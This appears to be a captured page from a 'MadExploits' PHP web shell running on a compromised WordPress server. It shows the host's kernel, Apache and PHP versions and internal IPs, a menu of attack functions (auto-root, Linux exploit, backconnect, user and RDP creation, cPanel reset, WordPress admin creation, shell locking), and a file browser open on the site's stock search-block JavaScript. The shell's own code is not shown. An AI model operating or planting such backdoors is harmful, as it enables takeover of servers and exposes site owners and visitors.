Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
mooceu /
wp-includes /
blocks /
search /
[ HOME SHELL ]
Name
Size
Permission
Action
block.json
2.07
KB
-rwxr-x--x
editor-rtl.css
310
B
-rwxr-x--x
editor-rtl.min.css
280
B
-rwxr-x--x
editor.css
310
B
-rwxr-x--x
editor.min.css
280
B
-rwxr-x--x
style-rtl.css
2.27
KB
-rwxr-x--x
style-rtl.min.css
2.05
KB
-rwxr-x--x
style.css
2.27
KB
-rwxr-x--x
style.min.css
2.05
KB
-rwxr-x--x
theme-rtl.css
141
B
-rwxr-x--x
theme-rtl.min.css
126
B
-rwxr-x--x
theme.css
141
B
-rwxr-x--x
theme.min.css
126
B
-rwxr-x--x
view.asset.php
84
B
-rwxr-x--x
view.js
2.32
KB
-rwxr-x--x
view.min.asset.php
84
B
-rwxr-x--x
view.min.js
1.2
KB
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : view.js
/******/ (function() { // webpackBootstrap var __webpack_exports__ = {}; window.addEventListener('DOMContentLoaded', () => { const hiddenClass = 'wp-block-search__searchfield-hidden'; Array.from(document.getElementsByClassName('wp-block-search__button-behavior-expand')).forEach(block => { const searchField = block.querySelector('.wp-block-search__input'); const searchButton = block.querySelector('.wp-block-search__button'); const searchLabel = block.querySelector('.wp-block-search__label'); const ariaLabel = searchButton.getAttribute('aria-label'); const id = searchField.getAttribute('id'); const toggleSearchField = showSearchField => { if (showSearchField) { searchField.removeAttribute('aria-hidden'); searchField.removeAttribute('tabindex'); searchButton.removeAttribute('aria-expanded'); searchButton.removeAttribute('aria-controls'); searchButton.setAttribute('type', 'submit'); searchButton.setAttribute('aria-label', 'Submit Search'); return block.classList.remove(hiddenClass); } searchButton.removeAttribute('type'); searchField.setAttribute('aria-hidden', 'true'); searchField.setAttribute('tabindex', '-1'); searchButton.setAttribute('aria-expanded', 'false'); searchButton.setAttribute('aria-controls', id); searchButton.setAttribute('aria-label', ariaLabel); return block.classList.add(hiddenClass); }; const hideSearchField = e => { if (!e.target.closest('.wp-block-search')) { return toggleSearchField(false); } if (e.key === 'Escape') { searchButton.focus(); return toggleSearchField(false); } }; const handleButtonClick = e => { if (block.classList.contains(hiddenClass)) { e.preventDefault(); searchField.focus(); toggleSearchField(true); } }; searchButton.removeAttribute('type'); searchField.addEventListener('keydown', e => { hideSearchField(e); }); searchButton.addEventListener('click', handleButtonClick); searchButton.addEventListener('keydown', e => { hideSearchField(e); }); if (searchLabel) { searchLabel.addEventListener('click', handleButtonClick); } document.body.addEventListener('click', hideSearchField); }); }); /******/ })() ;
Close